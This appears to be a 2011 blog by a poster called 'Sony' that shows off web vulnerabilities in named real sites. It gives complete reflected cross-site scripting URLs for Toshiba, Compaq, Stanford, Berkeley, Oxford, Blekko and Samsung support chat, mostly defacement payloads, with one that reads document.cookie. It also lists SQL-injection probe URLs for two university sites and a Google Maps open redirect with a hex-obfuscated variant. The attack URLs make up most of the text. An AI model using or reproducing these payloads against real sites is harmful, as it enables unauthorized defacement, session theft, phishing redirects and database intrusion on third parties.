marți, 29 noiembrie 2011

Toshiba.com and Compaq.com Cross Site Scripting

Browser ..Mozilla Firefox.

Toshiba.com

http://vuln.xssed.net/2011/11/29/start.toshiba.com/

http://start.toshiba.com/games/free_online_games.php?cat=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%20%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%20by%20Sony%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:%20url%28http://www.lenagold.ru/fon/peo/part/body09.jpg%29;}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%22%20style=%22height:%20400px;%20width:%20500px;%22%3E





Compaq.com

http://vuln.xssed.net/2011/11/29/neptest.nonstop.compaq.com/

https://neptest.nonstop.compaq.com/buildpage.asp?Page=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Without%20music,%20life%20would%20be%20a%20mistake..%20By%20Sony%22%29%3C/script%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Ciframe%20width=%22520%22%20height=%22415%22%20src=%22http://www.youtube.com/embed/BoAKPrzrKPI%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Cimg%20src=http://foxtrotters.tripod.com/ansnowmn2.gif%20align=center%3E




Publicat de Sony la 01:36 0 comentarii
Etichete: , ,

duminică, 27 noiembrie 2011

Stanford,Berkeley and Oxford XSS + bonus 2 sql..

Stanford University.

http://www-psearch.slac.stanford.edu/SLACSearch/app/slac/index?qt=%22%3E%3Cscript%3Ealert%28%22.%22%29%3C/script%3E%3E%3Cimg%20src=http://www.gifs.net/Animation11/Computers_and_Technology/Gears/In_the_head.gif%20align=center%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/J04lTwix8yA%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/pred/bum/buk/letter88.jpg%22%3E


SLACSearch/app/slac/index?qt=

Simple..


University of California, Berkeley.


https://iris.eecs.berkeley.edu/cgi-bin/search.cgi?query=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E



/cgi-bin/search.cgi?query=

Simple..



Oxford University.

http://www.univ.ox.ac.uk/search.php?keys=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/pred/bum/buk/letter45.jpg%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%20by%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/NerGuAfjDow%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E



/search.php?keys=

Simple..

And 2 sql..


http://www.begbroke.ox.ac.uk/Media/NewsEvents.php?year=2012'
http://halbook.trinhall.cam.ac.uk/seating_view.php?mealid=721'
Publicat de Sony la 07:18 0 comentarii
Etichete: , , , ,

joi, 24 noiembrie 2011

Blekko.com [web search engine] cross site scripting

What is blekko.com?

You can read here:

http://en.wikipedia.org/wiki/Blekko

So..our xss in the profile (website link)..

http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E


Publicat de Sony la 07:50 0 comentarii
Etichete: ,

miercuri, 23 noiembrie 2011

Winter and Samsung [cross site scripting mini art]

It's interesting place for xss.

http://vuln.xssed.net/2011/11/24/chat.support.samsung.com/

http://chat.support.samsung.com/LiveChat/chkCIC?site_cd=AE&jsoncallback=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Cheers%20to%20a%20new%20year%20and%20another%20chance%20for%20us%20to%20get%20it%20right.%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/45wmyMgyZuY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_santa_claus/santa_claus_78.gif%20align=center%3E%3Cimg%20src=http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%20align=center%3E

pics:




Publicat de Sony la 23:49 0 comentarii
Etichete: ,

miercuri, 2 noiembrie 2011

Google Maps Open Redirect

Demo Video :



http://maps.google.com/m/preferences?pref=s&bl=//st2tea.blogspot.com&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg

or

http://maps.google.com/m/preferences?pref=s&bl=//%73%74%32%74%65%61%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg
Publicat de Sony la 07:22 0 comentarii
Etichete: ,